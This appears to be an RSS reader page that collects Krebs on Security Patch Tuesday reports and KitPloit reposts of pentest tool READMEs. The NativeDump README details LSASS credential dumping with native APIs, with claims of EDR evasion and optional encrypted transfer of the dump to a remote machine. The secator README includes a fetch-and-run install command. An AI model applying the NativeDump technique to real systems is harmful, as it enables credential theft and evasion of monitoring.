FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ ☆ ✇ Krebs on Security

Patch Tuesday, April 2025 Edition

By: BrianKrebs — April 9th 2025 at 03:09

Microsoft today released updates to plug at least 121 security holes in its Windows operating systems and software, including one vulnerability that is already being exploited in the wild. Eleven of those flaws earned Microsoft’s most-dire “critical” rating, meaning malware or malcontents could exploit them with little to no interaction from Windows users.

The zero-day flaw already seeing exploitation is CVE-2025-29824, a local elevation of privilege bug in the Windows Common Log File System (CLFS) driver.  Microsoft rates it as “important,” but as Chris Goettl from Ivanti points out, risk-based prioritization warrants treating it as critical.

This CLFS component of Windows is no stranger to Patch Tuesday: According to Tenable’s Satnam Narang, since 2022 Microsoft has patched 32 CLFS vulnerabilities — averaging 10 per year — with six of them exploited in the wild. The last CLFS zero-day was patched in December 2024.

Narang notes that while flaws allowing attackers to install arbitrary code are consistently top overall Patch Tuesday features, the data is reversed for zero-day exploitation.

“For the past two years, elevation of privilege flaws have led the pack and, so far in 2025, account for over half of all zero-days exploited,” Narang wrote.

Rapid7’s Adam Barnett warns that any Windows defenders responsible for an LDAP server — which means almost any organization with a non-trivial Microsoft footprint — should add patching for the critical flaw CVE-2025-26663 to their to-do list.

“With no privileges required, no need for user interaction, and code execution presumably in the context of the LDAP server itself, successful exploitation would be an attractive shortcut to any attacker,” Barnett said. “Anyone wondering if today is a re-run of December 2024 Patch Tuesday can take some small solace in the fact that the worst of the trio of LDAP critical RCEs published at the end of last year was likely easier to exploit than today’s example, since today’s CVE-2025-26663 requires that an attacker win a race condition. Despite that, Microsoft still expects that exploitation is more likely.”

Among the critical updates Microsoft patched this month are remote code execution flaws in Windows Remote Desktop services (RDP), including CVE-2025-26671, CVE-2025-27480 and CVE-2025-27482; only the latter two are rated “critical,” and Microsoft marked both of them as “Exploitation More Likely.”

Perhaps the most widespread vulnerabilities fixed this month were in web browsers. Google Chrome updated to fix 13 flaws this week, and Mozilla Firefox fixed eight bugs, with possibly more updates coming later this week for Microsoft Edge.

As it tends to do on Patch Tuesdays, Adobe has released 12 updates resolving 54 security holes across a range of products, including ColdFusion, Adobe Commerce, Experience Manager Forms, After Effects, Media Encoder, BridgePremiere Pro, Photoshop, Animate, AEM Screens, and FrameMaker.

Apple users may need to patch as well. On March 31, Apple released a huge security update (more than three gigabytes in size) to fix issues in a range of their products, including at least one zero-day flaw.

And in case you missed it, on March 31, 2025 Apple released a rather large batch of security updates for a wide range of their products, from macOS to the iOS operating systems on iPhones and iPads.

Earlier today, Microsoft included a note saying Windows 10 security updates weren’t available but would be released as soon as possible. It appears from browsing askwoody.com that this snafu has since been rectified. Either way, if you run into complications applying any of these updates please leave a note about it in the comments below, because the chances are good that someone else had the same problem.

As ever, please consider backing up your data and or devices prior to updating, which makes it far less complicated to undo a software update gone awry. For more granular details on today’s Patch Tuesday, check out the SANS Internet Storm Center’s roundup. Microsoft’s update guide for April 2025 is here.

For more details on Patch Tuesday, check out the write-ups from Action1 and Automox.

☐ ☆ ✇ KitPloit - PenTest Tools!

Docf-Sec-Check - DockF-Sec-Check Helps To Make Your Dockerfile Commands More Secure

By: Unknown — April 4th 2025 at 19:18


DockF-Sec-Check helps to make your Dockerfile commands more secure.


Done

  • [x] First-level security notification in the Dockerfile

TODO List

  • [ ] Correctly detect the Dockerfile.
  • [ ] Second-level security notification in the Dockerfile.
  • [ ] Security notification in Docker images.
  • [ ] ***** (Private Repository)

Installation

From Source Code

You can use virtualenv for package dependencies before installation.

git clone https://github.com/OsmanKandemir/docf-sec-check.git
cd docf-sec-check
python setup.py build
python setup.py install

From Pypi

The application is available on PyPI. To install with pip:

pip install docfseccheck

From Dockerfile

You can run this application on a container after build a Dockerfile. You need to specify a path (YOUR-LOCAL-PATH) to scan the Dockerfile in your local.

docker build -t docfseccheck .
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile docfseccheck -f /docf-sec-check/Dockerfile

From DockerHub

docker pull osmankandemir/docfseccheck:v1.0
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile osmankandemir/docfseccheck:v1.0 -f /docf-sec-check/Dockerfile


Usage

-f DOCKERFILE [DOCKERFILE], --file DOCKERFILE [DOCKERFILE] Dockerfile path. --file Dockerfile

Function Usage

from docfchecker import DocFChecker

#Dockerfile is your file PATH.

DocFChecker(["Dockerfile"])

Development and Contribution

See; CONTRIBUTING.md

License

Copyright (c) 2024 Osman Kandemir \ Licensed under the GPL-3.0 License.

Donations

If you like DocF-Sec-Check and would like to show support, you can use Buy A Coffee or Github Sponsors feature for the developer using the button below.

Or

Sponsor me : https://github.com/sponsors/OsmanKandemir 😊

Your support will be much appreciated😊



☐ ☆ ✇ Krebs on Security

Microsoft: 6 Zero-Days in March 2025 Patch Tuesday

By: BrianKrebs — March 11th 2025 at 23:53

Microsoft today issued more than 50 security updates for its various Windows operating systems, including fixes for a whopping six zero-day vulnerabilities that are already seeing active exploitation.

Two of the zero-day flaws include CVE-2025-24991 and CVE-2025-24993, both vulnerabilities in NTFS, the default file system for Windows and Windows Server. Both require the attacker to trick a target into mounting a malicious virtual hard disk. CVE-2025-24993 would lead to the possibility of local code execution, while CVE-2025-24991 could cause NTFS to disclose portions of memory.

Microsoft credits researchers at ESET with reporting the zero-day bug labeled CVE-2025-24983, an elevation of privilege vulnerability in older versions of Windows. ESET said the exploit was deployed via the PipeMagic backdoor, capable of exfiltrating data and enabling remote access to the machine.

ESET’s Filip Jurčacko said the exploit in the wild targets only older versions of Windows OS: Windows 8.1 and Server 2012 R2. Although still used by millions, security support for these products ended more than a year ago, and mainstream support ended years ago. However, ESET notes the vulnerability itself also is present in newer Windows OS versions, including Windows 10 build 1809 and the still-supported Windows Server 2016.

Rapid7’s lead software engineer Adam Barnett said Windows 11 and Server 2019 onwards are not listed as receiving patches, so are presumably not vulnerable.

“It’s not clear why newer Windows products dodged this particular bullet,” Barnett wrote. “The Windows 32 subsystem is still presumably alive and well, since there is no apparent mention of its demise on the Windows client OS deprecated features list.”

The zero-day flaw CVE-2025-24984 is another NTFS weakness that can be exploited by inserting a malicious USB drive into a Windows computer. Barnett said Microsoft’s advisory for this bug doesn’t quite join the dots, but successful exploitation appears to mean that portions of heap memory could be improperly dumped into a log file, which could then be combed through by an attacker hungry for privileged information.

“A relatively low CVSSv3 base score of 4.6 reflects the practical difficulties of real-world exploitation, but a motivated attacker can sometimes achieve extraordinary results starting from the smallest of toeholds, and Microsoft does rate this vulnerability as important on its own proprietary severity ranking scale,” Barnett said.

Another zero-day fixed this month — CVE-2025-24985 — could allow attackers to install malicious code. As with the NTFS bugs, this one requires that the user mount a malicious virtual hard drive.

The final zero-day this month is CVE-2025-26633, a weakness in the Microsoft Management Console, a component of Windows that gives system administrators a way to configure and monitor the system. Exploiting this flaw requires the target to open a malicious file.

This month’s bundle of patch love from Redmond also addresses six other vulnerabilities Microsoft has rated “critical,” meaning that malware or malcontents could exploit them to seize control over vulnerable PCs with no help from users.

Barnett observed that this is now the sixth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication.

The SANS Internet Storm Center has a useful list of all the Microsoft patches released today, indexed by severity. Windows enterprise administrators would do well to keep an eye on askwoody.com, which often has the scoop on any patches causing problems. Please consider backing up your data before updating, and leave a comment below if you experience any issues applying this month’s updates.

☐ ☆ ✇ Krebs on Security

Microsoft Patch Tuesday, November 2024 Edition

By: BrianKrebs — November 12th 2024 at 21:59

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November’s patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine. Microsoft credits Google’s Threat Analysis Group with reporting the flaw.

The second bug fixed this month that is already seeing in-the-wild exploitation is CVE-2024-43451, a spoofing flaw that could reveal Net-NTLMv2 hashes, which are used for authentication in Windows environments.

Satnam Narang, senior staff research engineer at Tenable, says the danger with stolen NTLM hashes is that they enable so-called “pass-the-hash” attacks, which let an attacker masquerade as a legitimate user without ever having to log in or know the user’s password. Narang notes that CVE-2024-43451 is the third NTLM zero-day so far this year.

“Attackers continue to be adamant about discovering and exploiting zero-day vulnerabilities that can disclose NTLMv2 hashes, as they can be used to authenticate to systems and potentially move laterally within a network to access other systems,” Narang said.

The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server.

Ben McCarthy, lead cybersecurity engineer at Immersive Labs, called special attention to CVE-2024-43639, a remote code execution vulnerability in Windows Kerberos, the authentication protocol that is heavily used in Windows domain networks.

“This is one of the most threatening CVEs from this patch release,” McCarthy said. “Windows domains are used in the majority of enterprise networks, and by taking advantage of a cryptographic protocol vulnerability, an attacker can perform privileged acts on a remote machine within the network, potentially giving them eventual access to the domain controller, which is the goal for many attackers when attacking a domain.”

McCarthy also pointed to CVE-2024-43498, a remote code execution flaw in .NET and Visual Studio that could be used to install malware. This bug has earned a CVSS severity rating of 9.8 (10 is the worst).

Finally, at least 29 of the updates released today tackle memory-related security issues involving SQL server, each of which earned a threat score of 8.8. Any one of these bugs could be used to install malware if an authenticated user connects to a malicious or hacked SQL database server.

For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list. For administrators in charge of managing larger Windows environments, it pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users.

As always, if you experience any problems applying any of these updates, consider dropping a note about it in the comments; chances are excellent that someone else reading here has experienced the same issue, and maybe even has found a solution.

☐ ☆ ✇ Krebs on Security

Patch Tuesday, October 2024 Edition

By: BrianKrebs — October 8th 2024 at 22:21

Microsoft today released security updates to fix at least 117 security holes in Windows computers and other software, including two vulnerabilities that are already seeing active attacks. Also, Adobe plugged 52 security holes across a range of products, and Apple has addressed a bug in its new macOS 15Sequoia” update that broke many cybersecurity tools.

One of the zero-day flaws — CVE-2024-43573 — stems from a security weakness in MSHTML, the proprietary engine of Microsoft’s Internet Explorer web browser. If that sounds familiar it’s because this is the fourth MSHTML vulnerability found to be exploited in the wild so far in 2024.

Nikolas Cemerikic, a cybersecurity engineer at Immersive Labs, said the vulnerability allows an attacker to trick users into viewing malicious web content, which could appear legitimate thanks to the way Windows handles certain web elements.

“Once a user is deceived into interacting with this content (typically through phishing attacks), the attacker can potentially gain unauthorized access to sensitive information or manipulate web-based services,” he said.

Cemerikic noted that while Internet Explorer is being retired on many platforms, its underlying MSHTML technology remains active and vulnerable.

“This creates a risk for employees using these older systems as part of their everyday work, especially if they are accessing sensitive data or performing financial transactions online,” he said.

Probably the more serious zero-day this month is CVE-2024-43572, a code execution bug in the Microsoft Management Console, a component of Windows that gives system administrators a way to configure and monitor the system.

Satnam Narang, senior staff research engineer at Tenable, observed that the patch for CVE-2024-43572 arrived a few months after researchers at Elastic Security Labs disclosed an attack technique called GrimResource that leveraged an old cross-site scripting (XSS) vulnerability combined with a specially crafted Microsoft Saved Console (MSC) file to gain code execution privileges.

“Although Microsoft patched a different MMC vulnerability in September (CVE-2024-38259) that was neither exploited in the wild nor publicly disclosed,” Narang said. “Since the discovery of CVE-2024-43572, Microsoft now prevents untrusted MSC files from being opened on a system.”

Microsoft also patched Office, Azure, .NET, OpenSSH for Windows; Power BI; Windows Hyper-V; Windows Mobile Broadband, and Visual Studio. As usual, the SANS Internet Storm Center has a list of all Microsoft patches released today, indexed by severity and exploitability.

Late last month, Apple rolled out macOS 15, an operating system update called Sequoia that broke the functionality of security tools made by a number of vendors, including CrowdStrike, SentinelOne and Microsoft. On Oct. 7, Apple pushed an update to Sequoia users that addresses these compatibility issues.

Finally, Adobe has released security updates to plug a total of 52 vulnerabilities in a range of software, including Adobe Substance 3D Painter, Commerce, Dimension, Animate, Lightroom, InCopy, InDesign, Substance 3D Stager, and Adobe FrameMaker.

Please consider backing up important data before applying any updates. Zero-days aside, there’s generally little harm in waiting a few days to apply any pending patches, because not infrequently a security update introduces stability or compatibility issues. AskWoody.com usually has the skinny on any problematic patches.

And as always, if you run into any glitches after installing patches, leave a note in the comments; chances are someone else is stuck with the same issue and may have even found a solution.

☐ ☆ ✇ KitPloit - PenTest Tools!

Secator - The Pentester'S Swiss Knife

By: Unknown — September 22nd 2024 at 11:30


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes installed with the minimum amount of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... to list all tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



☐ ☆ ✇ KitPloit - PenTest Tools!

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Unknown — June 16th 2024 at 17:16


NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading Minidump undocumented structures, its structure can be summed up to:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-bytes structure which can be defined in C# as:

public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}

The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


B. Stream Directory

Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}

The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}

As there is only one, it gets simplified to:

public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}

The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}

Each module entry is a 16-bytes structure:

public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}

The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


F. Looping memory regions

There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
  2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


G. Creating Minidump file

After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




☐ ☆ ✇ Security – Cisco Blog

Security, the cloud, and AI: building powerful outcomes while simplifying your experience

By: Rick Miles — June 7th 2024 at 12:00
Read how Cisco Security Cloud Control prioritizes consolidation of tools and simplification of security policy without compromising your defense.
☐ ☆ ✇ KitPloit - PenTest Tools!

Above - Invisible Network Protocol Sniffer

By: Zion3R — May 22nd 2024 at 12:30


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + С

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

